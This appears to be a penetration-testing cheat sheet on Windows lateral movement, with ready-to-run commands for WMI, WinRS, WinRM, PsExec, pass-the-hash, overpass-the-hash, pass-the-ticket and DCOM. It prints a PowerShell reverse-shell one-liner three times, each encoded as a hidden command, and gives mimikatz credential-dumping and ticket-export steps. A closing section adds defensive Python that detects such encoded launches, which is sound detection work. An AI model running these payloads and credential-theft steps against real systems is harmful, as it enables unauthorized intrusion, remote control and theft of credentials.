# Lateral Movement

## WMI and WinRM

### WMI (Windows Management Instrumentation)

{% stepper %}
{% step %}

### Test whether a process can be created

{% code overflow="wrap" %}

```shell
wmic /node:<Target IP Address> /user:<Username> /password:<Password> process call create "calc"
```

{% endcode %}
{% endstep %}

{% step %}

### Save the following Python script as `encode.py`

{% code overflow="wrap" %}

```python
import base64

# PowerShell reverse-shell one-liner; fill in the listener address and port
payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# -EncodedCommand expects the script base64-encoded as UTF-16LE. Encoding with
# 'utf-16le' directly avoids the byte-order mark that 'utf16' prepends, so no
# slicing is needed and the result does not depend on the host's endianness
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)
```

{% endcode %}
{% endstep %}

{% step %}

### Run the script

```bash
python3 encode.py
```

{% endstep %}

{% step %}

### Paste the following in PowerShell

{% code overflow="wrap" %}

```powershell
$username = '<Username>';
$password = '<Password>';
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$Options = New-CimSessionOption -Protocol DCOM;
$Session = New-CimSession -ComputerName <Target IP Address> -Credential $credential -SessionOption $Options;

$Command = '<Paste the output from previous step>';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $Command};
```

{% endcode %}
{% endstep %}
{% endstepper %}

### WinRS

> **NOTE: For WinRS to work, the user must be a member of the Administrators or Remote Management Users group on the target machine**

{% stepper %}
{% step %}

### Test whether a command can be run

{% code overflow="wrap" %}

```powershell
winrs -r:<Target Hostname> -u:<Username> -p:<Password> "cmd /c hostname & whoami"
```

{% endcode %}
{% endstep %}

{% step %}

### Save the following Python script as `encode.py`

{% code overflow="wrap" %}

```python
import base64

# PowerShell reverse-shell one-liner; fill in the listener address and port
payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# -EncodedCommand expects the script base64-encoded as UTF-16LE. Encoding with
# 'utf-16le' directly avoids the byte-order mark that 'utf16' prepends, so no
# slicing is needed and the result does not depend on the host's endianness
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)
```

{% endcode %}
{% endstep %}

{% step %}

### Run the script

```bash
python3 encode.py
```

{% endstep %}

{% step %}

### Send the payload

{% code overflow="wrap" %}

```powershell
winrs -r:<Target Hostname> -u:<Username> -p:<Password> "<Paste the output from previous step>"
```

{% endcode %}
{% endstep %}
{% endstepper %}

### WinRM

{% stepper %}
{% step %}

### Paste the following in PowerShell

{% code overflow="wrap" %}

```powershell
$username = '<Username>';
$password = '<Password>';
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <Target IP Address> -Credential $credential
```

{% endcode %}
{% endstep %}

{% step %}

### Enter the session by its Id

```powershell
Enter-PSSession <Id>
```

{% endstep %}
{% endstepper %}

## PsExec

> **NOTE: For PsExec to run successfully, three conditions must be met**
>
> 1. The user that authenticates to the target machine must be a member of the local Administrators group
> 2. The ADMIN$ share must be available (available by default)
> 3. File and Printer Sharing must be turned on (on by default)

{% code overflow="wrap" %}

```powershell
C:\Tools\SysinternalsSuite\PsExec.exe -i \\<Target Hostname> -u <Domain Name>\<Username> -p <Password> cmd
```

{% endcode %}

## Pass the hash

> **NOTE: For Pass the Hash to work, three conditions must be met**
>
> 1. An SMB connection through the firewall (port 445)
> 2. The Windows File and Printer Sharing feature must be enabled (enabled by default)
> 3. The ADMIN$ share must be available (available by default) and the user must have local administrative permission

{% code overflow="wrap" %}

```bash
impacket-wmiexec -hashes :<NTLM Hash> <Username>@<Target IP Address>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
impacket-psexec -hashes :<NTLM Hash> <Username>@<Target IP Address>
```

{% endcode %}

## Overpass the Hash

> **NOTE: Overpass the Hash requires the NTLM hash of the user**
>
> **NOTE: Use this when you want to access another service as another user**

{% stepper %}
{% step %}

### Run mimikatz.exe

```powershell
C:\Tools\mimikatz.exe
```

{% endstep %}

{% step %}

### Enable SeDebugPrivilege

```powershell
privilege::debug
```

{% endstep %}

{% step %}

### Dump NTLM hash

```powershell
sekurlsa::logonpasswords
```

{% endstep %}

{% step %}

### Craft a Kerberos ticket

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:<Username> /domain:<Domain Name> /ntlm:<NTLM Hash> /run:powershell
```

{% endcode %}
{% endstep %}

{% step %}

### Authenticate to a service

```powershell
net use \\<Target Hostname>
```

{% endstep %}

{% step %}

### Verify that the ticket was acquired

```powershell
klist
```

{% endstep %}

{% step %}

### Run PsExec.exe

```powershell
C:\Tools\SysinternalsSuite\PsExec.exe \\<Target Hostname> cmd
```

{% endstep %}
{% endstepper %}

## Pass the ticket

> **NOTE: Use this when you want to access another service as another user**

{% stepper %}
{% step %}

### Run mimikatz.exe

```powershell
C:\Tools\mimikatz.exe
```

{% endstep %}

{% step %}

### Enable SeDebugPrivilege

```powershell
privilege::debug
```

{% endstep %}

{% step %}

### Export the tickets

```powershell
sekurlsa::tickets /export
```

{% endstep %}

{% step %}

### Find the kirbi files in PowerShell

```powershell
dir *.kirbi
```

{% endstep %}

{% step %}

### Use the ticket

```powershell
kerberos::ptt <Directory Name>
```

{% endstep %}

{% step %}

### Verify that the ticket was acquired

```powershell
klist
```

{% endstep %}
{% endstepper %}

## DCOM

{% stepper %}
{% step %}

### Paste the following in PowerShell

{% code overflow="wrap" %}

```powershell
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<Target IP Address>"))
```

{% endcode %}
{% endstep %}

{% step %}

### Save the following Python script as `encode.py`

{% code overflow="wrap" %}

```python
import base64

# PowerShell reverse-shell one-liner; fill in the listener address and port
payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# -EncodedCommand expects the script base64-encoded as UTF-16LE. Encoding with
# 'utf-16le' directly avoids the byte-order mark that 'utf16' prepends, so no
# slicing is needed and the result does not depend on the host's endianness
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)
```

{% endcode %}
{% endstep %}

{% step %}

### Run the script

```bash
python3 encode.py
```

{% endstep %}

{% step %}

### Paste the payload in PowerShell

{% code overflow="wrap" %}

```powershell
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"<Paste the output from previous step>","7")
```

{% endcode %}
{% endstep %}
{% endstepper %}
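The WMI, WinRS, PsExec and DCOM methods on this page all end the same way on the target: a well-known service process (WmiPrvSE.exe, wsmprovhost.exe, PSEXESVC.exe, mmc.exe) spawns the command, and in the WMI, WinRS and DCOM cases that command is `powershell -e` carrying a base64/UTF-16LE encoded script. The Python below is an added example from the defender's side, not code from this page: it decodes the `-EncodedCommand` argument out of process-creation records (Sysmon event 1 / Security 4688 field names), checks the decoded script for the strings that the reverse-shell one-liner above contains, and raises the severity when the parent is one of those remote-execution hosts. The log records are constructed for the example, the parent-process list and the indicator patterns are my own choice of what to look for, and the first encoded script is a non-functional fragment that only carries the indicator strings.

```python
import base64
import binascii
import re

# Parent processes that spawn the child when the remote-execution methods on this
# page are used. These pairings are well-known behaviour of the Windows components
# involved, not something taken from the page itself.
REMOTE_EXEC_PARENTS = {
    "wmiprvse.exe": "WMI Win32_Process.Create (wmic / Invoke-CimMethod)",
    "wsmprovhost.exe": "WinRM (winrs / New-PSSession / Enter-PSSession)",
    "mmc.exe": "DCOM MMC20.Application ExecuteShellCommand",
    "psexesvc.exe": "PsExec service (PSEXESVC)",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Strings present in the decoded script when it is the TCP reverse shell shown on this page.
SCRIPT_INDICATORS = [
    ("TCPClient", re.compile(r"(?i)System\.Net\.Sockets\.TCPClient")),
    ("GetStream", re.compile(r"(?i)\.GetStream\(\)")),
    ("Invoke-Expression", re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b")),
]
# Launch flags on the outer command line that an interactive operator rarely uses.
LAUNCH_INDICATORS = [
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("no profile", re.compile(r"(?i)-nop(?:rofile)?\b")),
]


def decode_encoded_command(command_line: str):
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        # -EncodedCommand is base64 of the script as UTF-16LE
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # bad base64 or an odd byte count: PowerShell would reject it too


def analyse(record: dict) -> dict:
    """Score one process-creation record (Sysmon 1 / Security 4688 style field names)."""
    parent = record.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmdline = record.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    indicators = [name for name, rx in LAUNCH_INDICATORS if rx.search(cmdline)]
    script_hits = []
    if decoded is not None:
        script_hits = [name for name, rx in SCRIPT_INDICATORS if rx.search(decoded)]
    indicators += script_hits
    remote_exec = REMOTE_EXEC_PARENTS.get(parent)
    if remote_exec and script_hits:
        severity = "high"    # remotely launched script that looks like the reverse shell
    elif remote_exec or (decoded is not None and indicators):
        severity = "medium"  # remote launch, or a suspicious encoded script from a local parent
    else:
        severity = "low"
    return {"remote_exec": remote_exec, "decoded": decoded,
            "indicators": indicators, "severity": severity}


def _enc(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records. The first encoded script is a non-functional fragment that
# only carries the indicator strings; the others are benign commands.
SAMPLE_RECORDS = [
    {"Image": PS, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -nop -w hidden -e "
                    + _enc('$c = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);iex $data')},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": "powershell -e " + _enc("Get-Service | Out-Null")},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": "cmd"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -e " + _enc("Get-Date")},
]


def run_samples():
    """Score every constructed record; returned in the same order as SAMPLE_RECORDS."""
    return [analyse(r) for r in SAMPLE_RECORDS]


if __name__ == "__main__":
    for rec, res in zip(SAMPLE_RECORDS, run_samples()):
        print(res["severity"], rec["ParentImage"], res["remote_exec"], res["indicators"])
```

Run it as-is to see the four sample records scored; in practice feed it records exported from Sysmon or the Security log. The hidden-window and no-profile flags are weak signals on their own and only count when an encoded command is present, which keeps scheduled administrative scripts from tripping the rule.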
